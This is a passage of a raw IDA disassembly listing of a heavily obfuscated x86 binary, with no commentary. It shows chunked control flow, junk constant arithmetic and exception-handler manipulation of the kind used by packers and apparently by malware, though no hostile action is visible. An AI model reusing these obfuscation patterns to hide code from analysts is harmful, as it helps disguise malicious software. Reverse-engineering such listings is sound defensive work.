; FUNCTION CHUNK AT 00428B82 SIZE 00000008 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
mov [ebp+var_1], al
jmp loc_42634F
sub_424E4F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_424E5D proc near ; CODE XREF: sub_4262C5:loc_423B1F�p
; hjohnhn9:00427F7D�j
xchg ecx, [esp+0]
pop ecx
pop ebp
retn
sub_424E5D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4262C5
loc_424E63: ; CODE XREF: sub_4262C5-2A24�j
; sub_428447+4�j
mov eax, [ebp-4]
jmp loc_424ADE
; END OF FUNCTION CHUNK FOR sub_4262C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42325E
loc_424E6B: ; CODE XREF: sub_42851A-3B0D�j
; sub_42325E:loc_428B46�j
ja loc_423B46
push 0B6B4C19Fh
; END OF FUNCTION CHUNK FOR sub_42325E
; START OF FUNCTION CHUNK FOR sub_42851A
loc_424E76: ; CODE XREF: sub_42851A:loc_4269E6�j
call sub_424877
mov edx, 95918C9Dh
push ebx
jmp loc_424EF1
; END OF FUNCTION CHUNK FOR sub_42851A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_424E86: ; CODE XREF: sub_425BD2:loc_424AB4�j
mov ebp, eax
pop eax
retn
; END OF FUNCTION CHUNK FOR sub_425BD2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424377
loc_424E8A: ; CODE XREF: sub_424377+3�j
jmp loc_42777F
; END OF FUNCTION CHUNK FOR sub_424377
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428477
loc_424E8F: ; CODE XREF: sub_428477-4A96�j
jmp nullsub_64
; END OF FUNCTION CHUNK FOR sub_428477
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427486
loc_424E94: ; CODE XREF: sub_427486:loc_4271F2�j
push offset loc_4266F0
loc_424E99: ; CODE XREF: sub_426A78:loc_425F15�j
jmp loc_4263D3
; END OF FUNCTION CHUNK FOR sub_427486
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_35. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42355C
loc_424E9F: ; CODE XREF: sub_42355C+2B37�j
jmp loc_425C40
; END OF FUNCTION CHUNK FOR sub_42355C
; =============== S U B R O U T I N E =======================================
sub_424EA4 proc near ; DATA XREF: hjohnhn9:00424B26�o
jz nullsub_111
sub_424EA4 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_428183
loc_424EAA: ; CODE XREF: sub_428183-4E50�j
; sub_428183+4�j
jns loc_42333E
push eax
push 0
call sub_428192
jmp loc_428B11
; END OF FUNCTION CHUNK FOR sub_428183
; ---------------------------------------------------------------------------
locret_424EBD: ; CODE XREF: hjohnhn9:0042611E�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424B97
loc_424EBE: ; CODE XREF: sub_424B97+7�j
jmp loc_42829E
; END OF FUNCTION CHUNK FOR sub_424B97
; ---------------------------------------------------------------------------
loc_424EC3: ; CODE XREF: hjohnhn9:004269F7�j
jz loc_423D7C
; =============== S U B R O U T I N E =======================================
sub_424EC9 proc near ; CODE XREF: sub_424C5F+6�p
; FUNCTION CHUNK AT 004262D5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427298 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427E0A SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00428A28 SIZE 00000012 BYTES
xchg esi, [esp+0]
pop esi
push eax
jmp loc_4262D5
sub_424EC9 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427D9D
loc_424ED3: ; CODE XREF: sub_427D9D+11�j
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F6h
setz al
loc_424EE0: ; CODE XREF: hjohnhn9:00428DCC�j
call sub_42392D
pop ecx
shl eax, 7
mov edx, [ebp+8]
loc_424EEC: ; CODE XREF: sub_424D99:loc_423EF4�j
jmp loc_42838D
; END OF FUNCTION CHUNK FOR sub_427D9D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42851A
loc_424EF1: ; CODE XREF: sub_42851A-3699�j
push 0DD8D7CECh
pop ebx
xor ebx, 56A764BCh
and ebx, 0A66DF4EDh
jnz loc_427EFB
; END OF FUNCTION CHUNK FOR sub_42851A
; START OF FUNCTION CHUNK FOR sub_424631
loc_424F09: ; CODE XREF: sub_424631+318F�j
jmp loc_427DB3
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
popf
or edx, 6DDE1E3h
jmp loc_424CAF
; ---------------------------------------------------------------------------
loc_424F1A: ; CODE XREF: hjohnhn9:00425D22�j
jbe locret_426747
; =============== S U B R O U T I N E =======================================
sub_424F20 proc near ; CODE XREF: hjohnhn9:00423DC2�p
xchg edx, [esp+0]
pop edx
or dword ptr [eax-8], 8
sub_424F20 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_424631
loc_424F28: ; CODE XREF: sub_424631-1235�j
; hjohnhn9:loc_423DAF�j ...
jno loc_4270A1
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F6h
jz loc_4249A3
loc_424F3E: ; CODE XREF: hjohnhn9:loc_426C41�j
jmp loc_42708C
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42304F
loc_424F43: ; CODE XREF: sub_42304F+3C09�j
call sub_427792
loc_424F48: ; CODE XREF: sub_424AE3+11�j
jmp loc_428AA2
; END OF FUNCTION CHUNK FOR sub_42304F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424698
loc_424F4D: ; CODE XREF: sub_424698+CB�j
jmp loc_4238FE
; END OF FUNCTION CHUNK FOR sub_424698
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42442F
loc_424F52: ; CODE XREF: sub_42442F+E�j
jmp sub_42897A
; END OF FUNCTION CHUNK FOR sub_42442F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4236A7
loc_424F57: ; CODE XREF: sub_4236A7-3E4�j
jmp loc_429027
; END OF FUNCTION CHUNK FOR sub_4236A7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42897B
loc_424F5C: ; CODE XREF: sub_42897B:loc_42898A�j
pop esi
rol esi, 0Bh
add esi, 11DFE9BEh
add esi, ebp
add esi, 921074C9h
mov [esi], eax
pop esi
jmp loc_424A1D
; END OF FUNCTION CHUNK FOR sub_42897B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427C9B
loc_424F76: ; CODE XREF: hjohnhn9:00424A87�j
; sub_427C9B-1B1D�j
push 1388h
push offset loc_42766A
jmp loc_426870
; END OF FUNCTION CHUNK FOR sub_427C9B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_79. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424161
loc_424F86: ; CODE XREF: sub_424161+4473�j
jmp loc_423ECC
; END OF FUNCTION CHUNK FOR sub_424161
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F65
loc_424F8B: ; CODE XREF: sub_423F65+B33�j
ja loc_4289BB
loc_424F91: ; CODE XREF: sub_423F65:loc_4275EE�j
push 0A06EE95Dh
pop eax
sub eax, 0DA827FA8h
add eax, 4B148C18h
or eax, 71537494h
add eax, 3DACEB06h
jmp loc_427550
; END OF FUNCTION CHUNK FOR sub_423F65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42363F
loc_424FB4: ; CODE XREF: sub_42363F+3E60�j
and ebx, ecx
loc_424FB6: ; CODE XREF: sub_42363F:loc_424860�j
call sub_424877
mov edx, 0F2B89A19h
call sub_4279ED
push ebx
push eax
pop ebx
xchg ebx, [esp+8+var_8]
jmp loc_4265C3
; END OF FUNCTION CHUNK FOR sub_42363F
; ---------------------------------------------------------------------------
mov [eax], ecx
sbb ecx, 0E452135Dh
jmp sub_4280D2
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428E98
loc_424FDE: ; CODE XREF: sub_428E98-3FB�j
jmp nullsub_90
; END OF FUNCTION CHUNK FOR sub_428E98
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423BC3
loc_424FE3: ; CODE XREF: sub_423BC3+253A�j
jmp loc_428C84
; END OF FUNCTION CHUNK FOR sub_423BC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427345
loc_424FE8: ; CODE XREF: sub_427345-3DB9�j
jmp nullsub_117
; END OF FUNCTION CHUNK FOR sub_427345
; ---------------------------------------------------------------------------
push edi
mov edi, ebp
xchg edi, [esp]
mov ebp, esp
push edi
mov edi, ecx
xchg edi, [esp]
jmp loc_4268B3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_63. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424698
loc_425001: ; CODE XREF: sub_424698:loc_423928�j
xchg ebx, [esp+0]
call sub_42345B
retn
; END OF FUNCTION CHUNK FOR sub_424698
; ---------------------------------------------------------------------------
loc_42500A: ; CODE XREF: hjohnhn9:0042796B�j
jmp loc_4232F7
; ---------------------------------------------------------------------------
push 0E0FE72Bh
pop eax
and eax, 9D4E0989h
xor eax, 4D20C620h
rol eax, 1Ch
jmp loc_424B11
; =============== S U B R O U T I N E =======================================
sub_425029 proc near ; CODE XREF: hjohnhn9:0042622F�j
; sub_427F90+512�p
; FUNCTION CHUNK AT 00423AE9 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00426AD1 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004270BB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042712D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042737B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428244 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428823 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00428999 SIZE 0000000B BYTES
xchg ebx, [esp+0]
pop ebx
cmp byte ptr [eax], 0
jnz loc_42712D
mov eax, [ebp-4]
mov [ebp-0Ch], eax
shl dword ptr [ebp-8], 8
loc_425040: ; CODE XREF: sub_424631:loc_4249B5�j
; sub_425029:loc_427135�j
jns loc_426AD1
jmp loc_428244
sub_425029 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0Fh
dd 0FFE2D986h, 0E6D8E9FFh
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4263E3
loc_425056: ; CODE XREF: sub_4263E3+2637�j
jge loc_427E45
ror ebp, 1Eh
cmp ecx, edx
jmp loc_426C9B
; END OF FUNCTION CHUNK FOR sub_4263E3
; ---------------------------------------------------------------------------
loc_425066: ; CODE XREF: hjohnhn9:loc_4261EC�j
jnz loc_425CE7
jmp loc_427989
; ---------------------------------------------------------------------------
loc_425071: ; DATA XREF: hjohnhn9:loc_427775�o
jmp loc_421AA0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423CDB
loc_425076: ; CODE XREF: sub_427C9B:loc_424496�j
; sub_423CDB+2A9F�j
jmp loc_426D2F
; END OF FUNCTION CHUNK FOR sub_423CDB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4279C0
loc_42507B: ; CODE XREF: sub_4279C0-1A58�j
jmp loc_425E85
; END OF FUNCTION CHUNK FOR sub_4279C0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
db 88h, 6, 2Ah
db 2 dup(0)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFCCh
jmp loc_423DCF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42466E
loc_425091: ; CODE XREF: sub_42466E:loc_42384C�j
push 0B0A77BC4h
pop ebx
or ebx, 86A635F3h
cmp ebx, 0E442EBFh
jmp loc_427DC7
; END OF FUNCTION CHUNK FOR sub_42466E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4263E3
loc_4250A8: ; CODE XREF: sub_4263E3+1C0D�j
push ecx
mov ecx, eax
xchg ecx, [esp+4+var_4]
retn
; END OF FUNCTION CHUNK FOR sub_4263E3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4246DB
loc_4250AF: ; CODE XREF: sub_4246DB+D�j
jmp nullsub_12
; END OF FUNCTION CHUNK FOR sub_4246DB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B05
loc_4250B4: ; CODE XREF: sub_423B05-8E1�j
mov eax, [ebp-8]
call sub_424771
jmp loc_4263DE
; END OF FUNCTION CHUNK FOR sub_423B05
; ---------------------------------------------------------------------------
loc_4250C1: ; CODE XREF: hjohnhn9:00426DE5�j
xchg ebx, edi
; =============== S U B R O U T I N E =======================================
sub_4250C3 proc near ; CODE XREF: sub_423CDB+2B29�p
; FUNCTION CHUNK AT 00428D2E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428F58 SIZE 00000014 BYTES
xchg esi, [esp+0]
pop esi
mov [ebp-0Ch], eax
jmp loc_428D2E
sub_4250C3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426211
loc_4250CF: ; CODE XREF: sub_426211:loc_423241�j
jz loc_424526
; END OF FUNCTION CHUNK FOR sub_426211
; START OF FUNCTION CHUNK FOR sub_426A78
loc_4250D5: ; CODE XREF: sub_426A78-385B�j
jmp loc_428EDE
; END OF FUNCTION CHUNK FOR sub_426A78
; ---------------------------------------------------------------------------
add ebp, 0E99035BCh
xchg ebx, [ecx]
mov [edx], edi
jmp loc_424526
; ---------------------------------------------------------------------------
popf
jmp sub_425CB3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A78
loc_4250EF: ; CODE XREF: sub_426A78:loc_427707�j
or eax, eax
jnz loc_42377B
jmp loc_428994
; END OF FUNCTION CHUNK FOR sub_426A78
; =============== S U B R O U T I N E =======================================
sub_4250FC proc near ; DATA XREF: sub_4287BF-5122�o
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00423114 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00423361 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004234A7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424D11 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004268DB SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00426912 SIZE 00000012 BYTES
cmp dword ptr [ebp-8], 0
jle loc_4268DB
mov eax, [ebp-4]
xor edx, edx
push edx
push eax
loc_42510D: ; CODE XREF: hjohnhn9:loc_426E86�j
; sub_4287BF-157E�j
mov eax, [ebp-8]
cdq
jmp loc_4234A7
sub_4250FC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jo loc_424D3B
jmp loc_427060
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427D6A
loc_425121: ; CODE XREF: sub_427D6A:loc_4231A3�j
xor edi, 6F7E9CD9h
or edi, 0F497BCCDh
add edi, 98A81ABh
popf
xchg edi, [esp-4+arg_0]
jmp loc_42681D
; END OF FUNCTION CHUNK FOR sub_427D6A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426F5A
loc_42513C: ; CODE XREF: sub_426F5A:loc_426A0E�j
jz loc_423E9B
jmp loc_427B8D
; END OF FUNCTION CHUNK FOR sub_426F5A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424335
loc_425147: ; CODE XREF: sub_424335:loc_428723�j
call sub_4238CC
loc_42514C: ; CODE XREF: sub_4260BD+1662�j
; sub_4278DC:loc_428571�j
add ecx, 88425BFDh
mov [ecx], eax
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_424335
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427852
loc_425156: ; CODE XREF: sub_427852+16A3�j
jmp loc_427F82
; END OF FUNCTION CHUNK FOR sub_427852
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4278DC
loc_42515B: ; CODE XREF: sub_4278DC:loc_42808F�j
rol eax, 0Bh
push eax
jmp loc_42438A
; END OF FUNCTION CHUNK FOR sub_4278DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_425164: ; CODE XREF: sub_424631-754�j
; sub_424631:loc_428E16�j
or [edx-8], eax
jmp loc_424F28
; ---------------------------------------------------------------------------
loc_42516C: ; CODE XREF: sub_424631-74B�j
; sub_424631+1FF2�j
cmp dword ptr [ebp-10h], 1
jnz loc_425240
mov eax, [ebp+8]
mov eax, [eax-8]
or eax, 8
or eax, 10h
jmp loc_428C44
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A78
loc_425187: ; CODE XREF: sub_426A78:loc_428994�j
jz loc_4289DD
jmp loc_427CB9
; END OF FUNCTION CHUNK FOR sub_426A78
; ---------------------------------------------------------------------------
mov [ebp-8], eax
push esi
push 2CB06042h
pop esi
xor esi, 0E83D6BF8h
jmp loc_4260EA
; ---------------------------------------------------------------------------
loc_4251A7: ; CODE XREF: hjohnhn9:004246D6�j
jl loc_428DA6
jmp loc_425B52
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424161
loc_4251B2: ; CODE XREF: sub_424161:loc_426C7F�j
; sub_424161+2B35�j
add eax, 14A21851h
xchg eax, [esp+0]
pushf
push 33B0E27Ah
pop eax
sub eax, 0C07AC534h
test eax, 800h
jmp loc_42457E
; END OF FUNCTION CHUNK FOR sub_424161
; =============== S U B R O U T I N E =======================================
sub_4251D3 proc near ; DATA XREF: sub_424354+3�o
var_4 = dword ptr -4
push ebp
mov ebp, ecx
xchg ebp, [esp+4+var_4]
mov esp, ebp
pop ebp
call sub_4264CF
loc_4251E1: ; CODE XREF: sub_4275F9+1B�j
jmp nullsub_13
sub_4251D3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4262C5
loc_4251E6: ; CODE XREF: sub_4262C5-2E55�j
jmp sub_427F43
; END OF FUNCTION CHUNK FOR sub_4262C5
; =============== S U B R O U T I N E =======================================
sub_4251EB proc near ; DATA XREF: hjohnhn9:0042468E�o
; FUNCTION CHUNK AT 004232D1 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00425FDC SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004283BA SIZE 00000005 BYTES
xchg ecx, [esp+0]
mov eax, ecx
pop ecx
and eax, 1FC491DEh
rol eax, 5
test eax, 200000h
jmp loc_4283BA
sub_4251EB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42325E
loc_425205: ; CODE XREF: sub_42325E+3B97�j
ja loc_42314E
loc_42520B: ; CODE XREF: sub_42325E:loc_423A82�j
call sub_424877
mov edx, 0BB931B55h
loc_425215: ; CODE XREF: sub_42363F:loc_427491�j
push ebx
push 0DBB46803h
jmp loc_427535
; END OF FUNCTION CHUNK FOR sub_42325E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F65
loc_425220: ; CODE XREF: sub_423F65+7�j
mov eax, [ebp-4]
push ebx
mov ebx, eax
xchg ebx, [esp+4+var_4]
push eax
push 0FBB90297h
pop eax
jmp loc_426C64
; END OF FUNCTION CHUNK FOR sub_423F65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_425235: ; CODE XREF: sub_424631:loc_428C44�j
mov edx, [ebp+8]
mov [edx-8], eax
jmp loc_424F28
; ---------------------------------------------------------------------------
loc_425240: ; CODE XREF: sub_424631+B3F�j
cmp dword ptr [ebp-10h], 2
jnz loc_424F28
mov eax, [ebp+8]
jmp loc_42692F
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B05
loc_425252: ; CODE XREF: sub_423B05:loc_428C49�j
call sub_42645D
loc_425257: ; DATA XREF: sub_423F77:loc_423F91�o
mov [ebp-4], eax
mov eax, [ebp-4]
movzx eax, byte ptr [eax]
mov edx, [ebp+8]
jmp loc_423BA1
; END OF FUNCTION CHUNK FOR sub_423B05
; ---------------------------------------------------------------------------
shl eax, 12h
jmp sub_427810
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426354
loc_425270: ; CODE XREF: sub_426354:loc_425E3A�j
add ecx, 93576428h
rol ecx, 1Eh
add ecx, 0CD535342h
call sub_428B28
; END OF FUNCTION CHUNK FOR sub_426354
; START OF FUNCTION CHUNK FOR sub_426B29
loc_425284: ; CODE XREF: sub_426B29+1�j
mov ebp, esp
add esp, 0FFFFFFF4h
mov [ebp-8], edx
mov [ebp-4], eax
cmp dword ptr [ebp-8], 0
jnz loc_427D8E
mov eax, [ebp-4]
mov [ebp-8], eax
jmp loc_427D8E
; END OF FUNCTION CHUNK FOR sub_426B29
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F65
loc_4252A4: ; CODE XREF: sub_423F65+368F�j
adc esi, 6C713FDFh
jmp loc_424A92
; END OF FUNCTION CHUNK FOR sub_423F65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427792
loc_4252AF: ; CODE XREF: sub_427792+B�j
or ecx, ecx
jz loc_4273B2
push offset sub_42304F
jmp nullsub_29
; END OF FUNCTION CHUNK FOR sub_427792
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_11. PRESS KEYPAD "+" TO EXPAND]
dw 2FFAh
dword_4252C4 dd 0CE7006EFh ; DATA XREF: sub_427324:loc_4279D7�w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428477
loc_4252C8: ; CODE XREF: sub_428477:loc_4287BA�j
jmp loc_4239D0
; END OF FUNCTION CHUNK FOR sub_428477
; ---------------------------------------------------------------------------
db 29h, 4Fh, 29h
dword_4252D0 dd 77E75CB5h ; DATA XREF: sub_423B05:loc_423505�w
; hjohnhn9:00426E1C�r ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42873F
loc_4252D4: ; CODE XREF: sub_42873F-54E6�j
jmp loc_427021
; END OF FUNCTION CHUNK FOR sub_42873F
; ---------------------------------------------------------------------------
db 28h, 18h, 41h
dword_4252DC dd 4 dup(2), 0C0h, 40h, 2 dup(1), 4 dup(2), 0C0h, 40h
; DATA XREF: hjohnhn9:004237C3�r
; sub_426354-15E1�r ...
dd 2 dup(1), 4 dup(2), 0C0h, 40h, 2 dup(1), 4 dup(2), 0C0h
dd 40h, 2 dup(1), 4 dup(2), 0C0h, 40h, 0
dd 1, 4 dup(2), 0C0h, 40h, 0
dd 1, 4 dup(2), 0C0h, 40h, 0
dd 401h, 4 dup(2), 0C0h, 40h, 0
dd 23h dup(1), 2 dup(2), 4 dup(0)
dd 40h, 42h, 0C0h, 0C2h, 4 dup(1), 10h dup(1E00h), 0C2h
dd 42h, 2 dup(0C2h), 0Ch dup(2), 0Ah dup(1), 60h, 5 dup(1)
dd 4 dup(8), 4 dup(1), 0C0h, 40h, 6 dup(1), 8 dup(0C0h)
dd 8 dup(40h), 2 dup(1C2h), 20h, 1, 2 dup(2), 0C2h, 42h
dd 1E0h, 1, 20h, 2 dup(1), 0C0h, 2 dup(1), 4 dup(2), 2 dup(0C0h)
dd 2 dup(1), 8 dup(2), 4 dup(1A00h), 4 dup(0C0h), 800h
dd 0A00h, 60h, 1A00h, 4 dup(1), 0
dd 1, 2 dup(0)
dd 2 dup(1), 2 dup(2), 6 dup(1), 2 dup(2)
dword_4256DC dd 2 ; DATA XREF: sub_426354-526�r
dd 3 dup(2), 1Ch dup(1), 5 dup(2), 1, 2, 19h dup(1), 10h dup(402h)
dd 10h dup(1), 0Bh dup(2), 3 dup(1), 2 dup(2), 1, 3 dup(0C2h)
dd 3 dup(2), 7 dup(1), 2 dup(2), 10h dup(0E00h), 10h dup(402h)
dd 3 dup(1), 2, 1C2h, 3 dup(2), 3 dup(1), 2, 1C2h, 0Bh dup(2)
dd 2 dup(1), 1C2h, 7 dup(2), 5 dup(1), 2, 9 dup(1), 3 dup(2)
dd 1, 2, 2 dup(1), 2 dup(2), 1, 3 dup(2), 1, 2, 1, 2 dup(2)
dd 2 dup(1), 2, 2 dup(1), 2 dup(2), 1, 3 dup(2), 1, 2
dd 1, 3 dup(2), 1, 2, 2 dup(1), 3 dup(2), 1, 3 dup(2)
dd 1, 66EE9h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_425AE1: ; CODE XREF: sub_425BD2+1358�j
jmp loc_429008
; END OF FUNCTION CHUNK FOR sub_425BD2
; ---------------------------------------------------------------------------
dw 21B2h
dword_425AE8 dd 77EB36A5h ; DATA XREF: sub_426D17:loc_4234F1�w
; hjohnhn9:004237A4�w
dword_425AEC dd 0 ; DATA XREF: hjohnhn9:loc_424300�o
; sub_427A58+7�o ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427C9B
loc_425AF0: ; CODE XREF: sub_427C9B+8F�j
or ecx, 4D6C3C87h
jnp loc_426AD7
loc_425AFC: ; CODE XREF: sub_426D02:loc_427458�j
lea edx, [ebp-14h]
mov eax, offset dword_428AF4
call sub_427AEB
jmp loc_42451C
; END OF FUNCTION CHUNK FOR sub_427C9B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_425B0E: ; CODE XREF: sub_424631+3B11�j
jz loc_428B61
jmp loc_428BE3
; END OF FUNCTION CHUNK FOR sub_424631
; =============== S U B R O U T I N E =======================================
sub_425B19 proc near ; CODE XREF: sub_427C9B:loc_427CE0�p
; FUNCTION CHUNK AT 00426A29 SIZE 00000002 BYTES
push ebx
push ecx
call sub_426A30
mov esp, [esp+8]
loc_425B24: ; CODE XREF: sub_426E8C-25B1�j
; sub_426E8C-25A6�j ...
xor eax, eax
loc_425B26: ; CODE XREF: sub_427032-7DE�j
pop large dword ptr fs:0
pop edx
pop ecx
jmp loc_426A29
sub_425B19 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_425B34 proc near ; DATA XREF: sub_426354+2863�o
add edx, 30h
mov eax, [ebp-10h]
mov [ebp+eax-20h], dl
call sub_426523
loc_425B43: ; CODE XREF: sub_426D02+75C�j
jmp loc_427D24
sub_425B34 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BF2
loc_425B48: ; CODE XREF: sub_425BF2:loc_427266�j
mov [ecx], ebx
xchg esi, [edx]
jmp loc_4290BA
; END OF FUNCTION CHUNK FOR sub_425BF2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_50. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_425B52: ; CODE XREF: hjohnhn9:004251AD�j
jmp loc_423591
; ---------------------------------------------------------------------------
loc_425B57: ; CODE XREF: hjohnhn9:00428227�j
pop esi
mov eax, ds:dword_428394
or eax, eax
jnz loc_4270B6
jmp loc_42886C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426475
loc_425B6B: ; CODE XREF: sub_426475-32A6�j
push esi
pop ebp
adc ebp, 815C8186h
xchg eax, ebx
loc_425B75: ; CODE XREF: sub_426475:loc_4231C3�j
xor ecx, 2A87C29Dh
add ecx, 0DE0DEAC2h
call sub_4280D2
; END OF FUNCTION CHUNK FOR sub_426475
; START OF FUNCTION CHUNK FOR sub_428CC9
loc_425B86: ; CODE XREF: sub_428CC9-4E9E�j
add eax, 0B9CCE796h
xor eax, 0F605D27Eh
call sub_426961
; END OF FUNCTION CHUNK FOR sub_428CC9
; START OF FUNCTION CHUNK FOR sub_4284CB
loc_425B97: ; CODE XREF: sub_4284CB+1D�j
jmp loc_427FBA
; END OF FUNCTION CHUNK FOR sub_4284CB
; ---------------------------------------------------------------------------
push ecx
jmp loc_423556
; ---------------------------------------------------------------------------
loc_425BA2: ; DATA XREF: sub_424631+378B�o
push eax
cmp dword ptr [ebp-14h], 5
setz al
call sub_42392D
pop ecx
shl eax, 3
jmp loc_4249BA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424161
loc_425BB8: ; CODE XREF: hjohnhn9:0042330C�j
; sub_424161+1F17�j ...
lea eax, [ebp-14h]
push ebp
mov ebp, eax
xchg ebp, [esp+0]
push 4
jmp loc_4279DE
; END OF FUNCTION CHUNK FOR sub_424161
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282F8
loc_425BC8: ; CODE XREF: sub_4282F8:loc_426189�j
push offset loc_42768A
jmp loc_426A5D
; END OF FUNCTION CHUNK FOR sub_4282F8
; =============== S U B R O U T I N E =======================================
sub_425BD2 proc near ; DATA XREF: sub_42859A-D0F�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423082 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423F21 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00424266 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424454 SIZE 0000000D BYTES
